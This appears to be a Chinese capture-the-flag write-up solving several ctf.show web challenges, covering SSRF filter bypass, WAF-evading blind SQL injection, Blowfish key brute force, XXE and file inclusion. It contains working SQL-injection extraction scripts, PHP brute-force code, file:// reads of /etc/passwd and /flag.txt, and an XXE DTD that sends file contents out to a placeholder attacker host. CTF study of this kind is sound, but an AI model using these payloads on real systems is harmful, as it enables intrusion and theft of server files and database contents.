web1_观字
<?php #flag in http://192.168.7.68/flag if(isset($_GET['url'])){ $url = $_GET['url']; $protocol = substr($url, 0,7); if($protocol!='http://'){ die('仅限http协议访问'); } if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){ die('仅限域名地址访问'); } system('curl '.$url); }
?url=http://192。168。7。68/flag
SSRF常见的URL绕过方式
1、“@”符号绕过 http://www.baidu.com@10.10.10.10与http://10.10.10.10请求是相同的。 2、点分割符号替换 在浏览器中可以使用不同的分割符号来代替域名中的.分割,可以使用。、。、.来代替: 3、本地回环地址 4、IP的进制转换 由于IP地址可以用多种格式表示,因此可以在URL中如下所示使用: 点分十进制IP地址:http://216.58.199.78 八进制IP地址:http://0330.0072.0307.0116(将每个十进制数字转换为八进制) 十六进制IP地址:http://0xD83AC74E或者http://0xD8.0x3A.0xC7.0x4E(将每个十进制数字转换为十六进制) 整数或DWORD IP地址:http://3627730766(将十六进制IP转换为整数) 5、短网址
web2_观星
先跑下敏感词拦截情况,拦截的关键词还挺多
用%09绕过空格的waf,这里还拦截了ASCII等盲注常用词
-1%09or%091%23 -1 or 1# 回显出所有的文章
平时的二分法的SQL盲注语句为
?stunum=(ascii(substr((select(group_concat(table_name))from('\ 'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid) ^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='web1'),{},1))>{})^1".format(i,mid)
fzuu一下,依次绕过waf代替如下
ORD()函数返回字符串中第一个字符的ASCII值
0 | %09 | |
3 | ascii | ord |
16 | = like | rlike regexp |
17 | ’ | 0x十六进制 |
19 | , | from for |
21 | " | 0x十六进制 |
脚本如下
import requests url = 'http://47320b32-c69e-453b-9618-096398f13ac8.challenge.ctf.show/index.php?id=1' res = '' for i in range(1, 50): high = 128 low = 32 mid = (high+low)//2 while high > low: # payload = "^(ord(substr((database())from({})for(1)))>{})^1".format(i, mid) # payload = "^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from({})for(1)))>{})^1".format(i,mid) # payload = "^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)in(0x666c6167))from({})for(1)))>{})^1".format(i,mid) payload = "^(ord(substr((select(group_concat(flag))from(web1.flag))from({})for(1)))>{})^1".format(i,mid) s = requests.get(url=url+payload) if 'Kipling' in s.text: low = mid+1 else: high = mid mid = (high+low)//2 # print(mid) res += chr(mid) print(res)
网上的脚本(非二分)
import requests baseurl='http://426c70b1-b58c-4b5e-8e2d-abf5bde77c46.chall.ctf.show/index.php?id=1^' value="" for i in range(1,50): print("i=" + str(i)) for j in range(38,128): # paylaod='case(ord(substr(database()from({})for(1))))when({})then(2)else(3)end'.format(i,j) #paylaod='case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({})for(1))))when({})then(2)else(3)end'.format(i,j) # paylaod='case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({})for(1))))when({})then(2)else(3)end'.format(i,j) paylaod='case(ord(substr((select(flag)from(flag))from({})for(1))))when({})then(2)else(3)end'.format(i,j) # "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i, j) newurl=baseurl+paylaod rep=requests.get(newurl).text # print(rep) if "I asked nothing" in rep: print(value) value+=chr(j) break
web3_观图
showImage.php?image=Z6Ilu83MIDw= 在某些平台下(例如 Windows)RAND_MAX 只有32768
<?php //$key = substr(md5('ctfshow'.rand()),3,8); //flag in config.php include('config.php'); if(isset($_GET['image'])){ $image=$_GET['image']; $str = openssl_decrypt($image, 'bf-ecb', $key); if(file_exists($str)){ header('content-type:image/gif'); echo file_get_contents($str); } }else{ highlight_file(__FILE__); } ?>
<?php $image="Z6Ilu83MIDw="; for($i=0;$i<40000;$i++) { $key = substr(md5('ctfshow' . $i), 3, 8); $str = openssl_decrypt($image, 'bf-ecb', $key); if(strpos($str,'jpg')|strpos($str,'png')|strpos($str,'gif')) { echo $i.PHP_EOL; echo $key.PHP_EOL; echo $str; break; } } ?>
27347
5a78dbb4
1.jpg
<?php $image="config.php"; $key = "5a78dbb4"; $str = openssl_encrypt($image, 'bf-ecb', $key); echo $str; ?>
?image=N6bf8Bd8jm0SpmTZGl0isw==
web4_观心
<!-- flag in filesystem /flag.txt -->
POST /api.php HTTP/1.1 Host: f3fcabf4-3e41-4da7-a0cf-0d5f8262a36e.challenge.ctf.show Content-Length: 74 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://f3fcabf4-3e41-4da7-a0cf-0d5f8262a36e.challenge.ctf.show Referer: http://f3fcabf4-3e41-4da7-a0cf-0d5f8262a36e.challenge.ctf.show/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close api=http://flash.weather.com.cn/wmaps/xml/city.xml&city=Fuzhou
发现api.php
Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name does not resolve in /var/www/html/api.php on line 16 Warning: file_get_contents(http://flash.weather.com.cn/wmaps/xml/fuzhou.xml): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name does not resolve in /var/www/html/api.php on line 16 Warning: DOMDocument::loadXML(): Empty string supplied as input in /var/www/html/api.php on line 20 Warning: simplexml_import_dom(): Invalid Nodetype to import in /var/www/html/api.php on line 21 Fatal error: Uncaught Error: Call to a member function children() on null in /var/www/html/api.php:28 Stack trace: #0 {main} thrown in /var/www/html/api.php on line 28
文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML文档中(内部引用),也可作为一个外部引用。
DTD文档中有很多重要的关键字如下:
- DOCTYPE(DTD的声明)
- ENTITY(实体的声明)
- SYSTEM、PUBLIC(外部资源申请)
可以用如下语法引入外部DTD
<!DOCTYPE 根元素 SYSTEM "文件名">
解析一个xml文件,这里考虑xxe外带文件内容
test.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip:6666?p=%file;'>"> a.xml <!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://ip/test.dtd"> %remote;%int;%send; ]>
监听相应端口,成功将passwd外带出来,同理修改为/flag.txt即可
签到_观己
<?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file); } }else{ highlight_file(__FILE__); } ?>
简单的文件包含题目,过滤了php关键字
GET /?file=file:///flag.txt